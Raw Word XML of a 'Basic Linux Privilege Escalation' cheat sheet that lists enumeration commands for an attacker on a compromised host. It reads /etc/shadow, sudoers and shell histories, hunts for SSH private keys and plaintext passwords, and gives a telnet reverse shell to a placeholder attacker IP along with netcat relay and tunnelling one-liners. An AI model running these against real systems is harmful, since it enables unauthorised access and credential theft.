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57E" w:rsidRPr="0096257E" w:rsidRDefault="0096257E" w:rsidP="0096257E">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="6" w:space="0" w:color="B0B0B0"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0096257E">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:kern w:val="36"/>
          <w:sz w:val="73"/>
          <w:szCs w:val="73"/>
        </w:rPr>
        <w:t>Basic Linux Privilege Escalation</w:t>
      </w:r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color w:val="222222"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Before starting, I would like to point out - </w:t>
      </w:r>
      <w:r w:rsidRPr="0096257E">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>I'm no expert</w:t>
      </w:r>
      <w:r w:rsidRPr="0096257E">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. As far as I know, there isn't a "magic" answer, in this huge area. This is simply my finding, typed up, to be shared </w:t>
      </w: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(my </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="0096257E">
          <w:rPr>
            <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
            <w:i/>
            <w:iCs/>
            <w:color w:val="751590"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:u w:val="single"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>starting point</w:t>
        </w:r>
      </w:hyperlink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)</w:t>
      </w:r>
      <w:r w:rsidRPr="0096257E">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. Below is a mixture of commands to do the same thing, to look at things in a different place or just a different light. I know there more "things" to look for. It's just a </w:t>
      </w:r>
      <w:r w:rsidRPr="0096257E">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>basic &amp; rough guide</w:t>
      </w:r>
      <w:r w:rsidRPr="0096257E">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. Not every command will work for each system as Linux varies so much. "It" will not jump off the screen - you've to hunt for that </w:t>
      </w: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"little thing"</w:t>
      </w:r>
      <w:r w:rsidRPr="0096257E">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> as "</w:t>
      </w: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the devil is in the detail</w:t>
      </w:r>
      <w:r w:rsidRPr="0096257E">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>".</w:t>
      </w:r>
    </w:p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0" w:name="Enumeration.is.the.key."/>
      <w:bookmarkEnd w:id="0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Enumeration is the key.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0096257E" w:rsidRPr="0096257E" w:rsidRDefault="0096257E" w:rsidP="0096257E">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:spacing w:after="36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color w:val="222222"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(Linux) privilege escalation is all about:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0096257E" w:rsidRPr="0096257E" w:rsidRDefault="0096257E" w:rsidP="0096257E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="312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color w:val="222222"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Collect -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Enumeration</w:t>
      </w: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, more enumeration and some more enumeration.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0096257E" w:rsidRPr="0096257E" w:rsidRDefault="0096257E" w:rsidP="0096257E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="312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color w:val="222222"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Process - </w:t>
      </w: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Sort through data, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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analyse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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prioritisation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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.</w:t>
      </w:r>
      <w:bookmarkStart w:id="1" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w:rsidR="0096257E" w:rsidRPr="0096257E" w:rsidRDefault="0096257E" w:rsidP="0096257E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="312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color w:val="222222"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Search - </w:t>
      </w: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Know what to search for and where to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find </w:t>
      </w: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the exploit code.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0096257E" w:rsidRPr="0096257E" w:rsidRDefault="0096257E" w:rsidP="0096257E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="312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color w:val="222222"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Adapt -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Customize</w:t>
      </w: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 the exploit, so it fits. Not every exploit work for every system "out of the box".</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0096257E" w:rsidRPr="0096257E" w:rsidRDefault="0096257E" w:rsidP="0096257E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="312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color w:val="222222"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Try - </w:t>
      </w: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Get ready for (lots of)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trial and error</w:t>
      </w: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.</w:t>
      </w:r>
    </w:p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1"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="42"/>
          <w:szCs w:val="42"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="Operating.System"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidRPr="0096257E">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="42"/>
          <w:szCs w:val="42"/>
        </w:rPr>
        <w:t>Operating System</w:t>
      </w:r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3" w:name="What.s.the.distribution.type...em.What.v"/>
      <w:bookmarkEnd w:id="3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What's the distribution type?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What version?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/issue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/*-release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lsb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-release      # Debian based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redhat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-release   #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Redhat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based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4" w:name="What.s.the.kernel.version...em.Is.it.64-"/>
      <w:bookmarkEnd w:id="4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What's the kernel version?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Is it 64-bit?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5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/proc/version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uname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-a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uname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mrs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rpm -q kernel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dmesg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| grep Linux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ls /boot | grep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vmlinuz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-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5" w:name="What.can.be.learnt.from.the.environmenta"/>
      <w:bookmarkEnd w:id="5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What can be learnt from the environmental variables?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lastRenderedPageBreak/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5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6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7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/profile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bashrc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bash_profile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~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/.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bashrc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gram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bash_logout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env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set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6" w:name="Is.there.a.printer."/>
      <w:bookmarkEnd w:id="6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Is there a printer?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lpstat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-a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1"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="42"/>
          <w:szCs w:val="42"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="Applications..amp..Services"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidRPr="0096257E">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="42"/>
          <w:szCs w:val="42"/>
        </w:rPr>
        <w:t>Applications &amp; Services</w:t>
      </w:r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8" w:name="What.services.are.running...em.Which.ser"/>
      <w:bookmarkEnd w:id="8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What services are running?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Which service has which user privilege?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ps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aux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ps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ef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top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/services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9" w:name="Which.service.s..are.been.running.by..em"/>
      <w:bookmarkEnd w:id="9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Which service(s) are been running by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root? Of these services, which are vulnerable - it's worth a double check!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ps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aux | grep root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ps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ef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| grep root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10" w:name="What.applications.are.installed...em.Wha"/>
      <w:bookmarkEnd w:id="10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What applications are installed?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What version are they? Are they currently running?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5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usr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/bin/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sbin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dpkg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-l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rpm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qa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/var/cache/apt/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archivesO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/var/cache/yum/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11" w:name="Any.of.the.service.s..settings.misconfig"/>
      <w:bookmarkEnd w:id="11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Any of the service(s) settings misconfigured?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Are any (vulnerable) plugins attached?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"/>
        <w:gridCol w:w="9138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5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6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lastRenderedPageBreak/>
              <w:t>7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8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9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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16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syslog.conf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chttp.conf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lighttpd.conf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/cups/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cupsd.conf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inetd.conf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/apache2/apache2.conf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my.conf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httpd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/conf/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httpd.conf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/opt/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lampp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httpd.conf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aRl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/ |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awk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'$1 ~ /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^.*</w:t>
            </w:r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r.*/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12" w:name="What.jobs.are.scheduled."/>
      <w:bookmarkEnd w:id="12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lastRenderedPageBreak/>
        <w:t>What jobs are scheduled?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"/>
        <w:gridCol w:w="9138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5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6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7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8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9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10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12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16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crontab -l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/var/spool/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cron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-al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/ | grep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cron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-al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cron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*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cron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*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at.allow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at.deny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cron.allow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cron.deny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/crontab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anacrontab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/var/spool/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cron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/crontabs/root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13" w:name="Any.plain.text.usernames.and.or.password"/>
      <w:bookmarkEnd w:id="13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Any plain text usernames and/or passwords?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grep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i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user [filename]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grep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i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pass [filename]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grep -C 5 "password" [filename]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find .</w:t>
            </w:r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-name "*.php" -print0 |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xargs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-0 grep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i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-n "var $password"   # Joomla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1"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="42"/>
          <w:szCs w:val="42"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="Communications..amp..Networking"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r w:rsidRPr="0096257E">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="42"/>
          <w:szCs w:val="42"/>
        </w:rPr>
        <w:t>Communications &amp; Networking</w:t>
      </w:r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15" w:name="What.NIC.s..does.the.system.have...em.Is"/>
      <w:bookmarkEnd w:id="15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What NIC(s) does the system have?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Is it connected to another network?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sbin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/ifconfig -a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/network/interfaces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sysconfig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/network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16" w:name="What.are.the.network.configuration.setti"/>
      <w:bookmarkEnd w:id="16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What are the network configuration settings?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What can you find out about this network? DHCP server? DNS server? Gateway?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5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lastRenderedPageBreak/>
              <w:t>6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resolv.conf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sysconfig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/network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/networks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iptables -L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hostname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>dnsdomainname</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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17" w:name="What.other.users..amp..hosts.are.communi"/>
      <w:bookmarkEnd w:id="17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lastRenderedPageBreak/>
        <w:t>What other users &amp; hosts are communicating with the system?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"/>
        <w:gridCol w:w="9138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5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6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7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8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9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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16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lsof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i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lsof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i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:80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grep 80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/services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netstat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antup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netstat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antpx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netstat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tulpn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chkconfig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--list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chkconfig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--list | grep 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3:on</w:t>
            </w:r>
            <w:proofErr w:type="gram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last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w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18" w:name="Whats.cached...em.IP.and.or.MAC.addresse"/>
      <w:bookmarkEnd w:id="18"/>
      <w:proofErr w:type="spellStart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Whats</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> cached?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IP and/or MAC addresses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arp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-e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route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sbin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/route -nee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19" w:name="Is.packet.sniffing.possible..What.can.be"/>
      <w:bookmarkEnd w:id="19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Is packet sniffing possible? What can be seen?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Listen to live traffic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tcpdump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tcp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dst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192.168.1.7 80 and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tcp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dst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10.5.5.252 21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Note: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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tcpdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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dst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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] [port] and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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dst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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] [port]</w:t>
      </w:r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20" w:name="Have.you.got.a.shell...em.Can.you.intera"/>
      <w:bookmarkEnd w:id="20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Have you got a shell?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Can you interact with the system?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nc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lvp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4444    # Attacker. Input (Commands)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nc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lvp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4445    # Attacker.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Ouput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(Results)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telnet [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atackers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ip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] 44444 | /bin/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| [local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ip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] 44445    # On the targets system. Use the attackers IP!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Note: </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="0096257E">
          <w:rPr>
            <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
            <w:i/>
            <w:iCs/>
            <w:color w:val="751590"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:u w:val="single"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>http://lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/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21" w:name="Is.port.forwarding.possible...em.Redirec"/>
      <w:bookmarkEnd w:id="21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Is port forwarding possible?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Redirect and interact with traffic from another view</w:t>
      </w:r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Note: </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="0096257E">
          <w:rPr>
            <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
            <w:i/>
            <w:iCs/>
            <w:color w:val="751590"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:u w:val="single"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>http://www.boutell.com/rinetd/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Note: </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="0096257E">
          <w:rPr>
            <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
            <w:i/>
            <w:iCs/>
            <w:color w:val="751590"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:u w:val="single"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>http://www.howtoforge.com/port-forwarding-with-rinetd-on-debian-etch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Note: </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="0096257E">
          <w:rPr>
            <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
            <w:i/>
            <w:iCs/>
            <w:color w:val="751590"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:u w:val="single"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>http://downloadcenter.mcafee.com/products/tools/foundstone/fpipe2_1.zip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Note: FPipe.exe -l [local port] -r [remote port] -s [local port] [local IP]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FPipe.exe -l 80 -r 80 -s 80 192.168.1.7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Note: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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-[L/R] [local port</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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]:[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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remote </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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]:[remote port] [local user]@[local </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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]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-L 8080:127.0.0.1:80 root@192.168.1.7    # Local Port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-R 8080:127.0.0.1:80 root@192.168.1.7    # Remote Port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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Note: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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mknod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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backpipe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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p ;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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-l -p [remote port] &lt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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backpipe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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| </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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[local IP] [local port] &gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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backpipe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17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mknod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backpipe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p ;</w:t>
            </w:r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nc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-l -p 8080 &lt;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backpipe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|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nc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10.5.5.151 80 &gt;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backpipe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 # Port Relay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mknod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backpipe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p ;</w:t>
            </w:r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nc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-l -p 8080 0 &amp; &lt;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backpipe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| tee -a inflow |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nc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localhost 80 | tee -a outflow 1&gt;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backpipe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 # Proxy (Port 80 to 8080)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mknod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backpipe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p ;</w:t>
            </w:r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nc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-l -p 8080 0 &amp; &lt;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backpipe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| tee -a inflow |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nc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localhost 80 | tee -a outflow &amp; 1&gt;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backpipe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 # Proxy monitor (Port 80 to 8080)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22" w:name="Is.tunnelling.possible...em.Send.command"/>
      <w:bookmarkEnd w:id="22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 xml:space="preserve">Is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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tunnelling</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> possible?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Send commands locally, remotely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-D 127.0.0.1:9050 -N [username]@[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ip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]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proxychains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ifconfig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1"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="42"/>
          <w:szCs w:val="42"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="Confidential.Information..amp..Users"/>
      <w:bookmarkEnd w:id="23"/>
      <w:r w:rsidRPr="0096257E">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="42"/>
          <w:szCs w:val="42"/>
        </w:rPr>
        <w:t>Confidential Information &amp; Users</w:t>
      </w:r>
    </w:p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24" w:name="Who.are.you..Who.is.logged.in..Who.has.b"/>
      <w:bookmarkEnd w:id="24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Who are you? Who is logged in? Who has been logged in? Who else is there? Who can do what?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5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6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7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8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9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id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who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w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last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/passwd | cut -d: -f1    # List of users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grep -v -E "^#"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/passwd |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awk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-F: '$3 == 0 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{ print</w:t>
            </w:r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$1}'   # List of super users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awk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-F: '($3 == "0") {print}'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/passwd   # List of super users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sudoers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sudo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-l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25" w:name="What.sensitive.files.can.be.found."/>
      <w:bookmarkEnd w:id="25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What sensitive files can be found?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/passwd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/group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/shadow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/var/mail/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26" w:name="Anything..interesting..in.the.home.direc"/>
      <w:bookmarkEnd w:id="26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 xml:space="preserve">Anything "interesting" in the home </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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directorie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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(s)?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If it's possible to access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ahlR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/root/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ahlR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/home/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27" w:name="Are.there.any.passwords.in..scripts..dat"/>
      <w:bookmarkEnd w:id="27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Are there any passwords in; scripts, databases, configuration files or log files?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Default paths and locations for passwords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lastRenderedPageBreak/>
              <w:t>3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>cat /var/apache2/config.inc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/var/lib/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mysql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mysql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user.MYD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>cat /root/anaconda-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ks.cfg</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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28" w:name="What.has.the.user.being.doing...em.Is.th"/>
      <w:bookmarkEnd w:id="28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lastRenderedPageBreak/>
        <w:t>What has the user being doing?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 xml:space="preserve">Is there any password in plain text? What have they been </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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edting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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bash_history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~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/.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nano</w:t>
            </w:r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_history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~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/.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atftp</w:t>
            </w:r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_history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~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/.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mysql</w:t>
            </w:r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_history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php_history</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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29" w:name="What.user.information.can.be.found."/>
      <w:bookmarkEnd w:id="29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What user information can be found?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~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/.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bashrc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gram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~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/.profile</w:t>
            </w:r>
            <w:proofErr w:type="gram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/var/mail/root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/var/spool/mail/root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30" w:name="Can.private-key.information.be.found."/>
      <w:bookmarkEnd w:id="30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Can private-key information be found?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"/>
        <w:gridCol w:w="9138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5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6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7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8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9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10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15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16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authorized_keys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/identity.pub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/identity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/id_rsa.pub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id_rsa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/id_dsa.pub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id_dsa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ssh_config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sshd_config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/ssh_host_dsa_key.pub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ssh_host_dsa_key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/ssh_host_rsa_key.pub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ssh_host_rsa_key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/ssh_host_key.pub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ssh_host_key</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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1"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="42"/>
          <w:szCs w:val="42"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="File.Systems"/>
      <w:bookmarkEnd w:id="31"/>
      <w:r w:rsidRPr="0096257E">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="42"/>
          <w:szCs w:val="42"/>
        </w:rPr>
        <w:t>File Systems</w:t>
      </w:r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32" w:name="Which.configuration.files.can.be.written"/>
      <w:bookmarkEnd w:id="32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Which configuration files can be written in /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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/?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Able to reconfigure a service?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lastRenderedPageBreak/>
              <w:t>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5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6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7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aRl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/ |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awk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'$1 ~ /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^.*</w:t>
            </w:r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w.*/' 2&gt;/dev/null     # Anyone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aRl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/ |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awk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'$1 ~ /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^..</w:t>
            </w:r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w/' 2&gt;/dev/null       # Owner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aRl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/ |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awk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'$1 ~ /^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.....</w:t>
            </w:r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w/' 2&gt;/dev/null    # Group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aRl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/ |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awk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'$1 ~ /w.$/' 2&gt;/dev/null        # Other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 -readable -type f 2&gt;/dev/null               # Anyone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 -readable -type f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maxdepth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1 2&gt;/dev/null   # Anyone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33" w:name="What.can.be.found.in..var..."/>
      <w:bookmarkEnd w:id="33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lastRenderedPageBreak/>
        <w:t>What can be found in /var</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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/ ?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5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6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7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/var/log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/var/mail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/var/spool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/var/spool/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lpd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/var/lib/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pgsql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/var/lib/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mysql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/var/lib/dhcp3/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dhclient.leases</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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34" w:name="Any.settings.files..hidden..on.website.."/>
      <w:bookmarkEnd w:id="34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Any settings/files (hidden) on website?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Any settings file with database information?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alhR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/var/www/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alhR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srv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/www/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htdocs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alhR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usr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/local/www/apache22/data/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alhR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/opt/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lampp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htdocs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alhR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/var/www/html/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color w:val="222222"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Is there anything in the log file(s) </w:t>
      </w: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(Could help with "Local File Includes"!)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"/>
        <w:gridCol w:w="9138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5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6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7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8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9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10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15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16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lastRenderedPageBreak/>
              <w:t>17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18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19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20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25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26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27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28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29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30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35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36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37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38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39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40</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16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httpd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/logs/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access_log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httpd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/logs/access.log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httpd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/logs/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error_log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httpd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/logs/error.log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/var/log/apache2/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access_log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/var/log/apache2/access.log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/var/log/apache2/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error_log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/var/log/apache2/error.log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/var/log/apache/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access_log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/var/log/apache/access.log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/var/log/auth.log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/var/log/chttp.log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/var/log/cups/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error_log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/var/log/dpkg.log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faillog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httpd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access_log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>cat /var/log/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httpd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/access.log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httpd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error_log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httpd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/error.log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lastlog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lighttpd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/access.log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lighttpd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/error.log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lighttpd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/lighttpd.access.log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lighttpd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/lighttpd.error.log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/var/log/messages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/var/log/secure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/var/log/syslog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wtmp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xferlog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/var/log/yum.log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/var/run/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utmp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webmin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/miniserv.log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/var/www/logs/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access_log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/var/www/logs/access.log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/var/lib/dhcp3/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/var/log/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postgresql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/var/log/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proftpd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/var/log/samba/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Note: auth.log, boot,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btmp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, daemon.log, debug,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dmesg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, kern.log, mail.info, mail.log, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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mail.warn</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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, messages, syslog,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udev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,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wtmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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lastRenderedPageBreak/>
        <w:t>Note: </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="0096257E">
          <w:rPr>
            <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
            <w:i/>
            <w:iCs/>
            <w:color w:val="751590"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
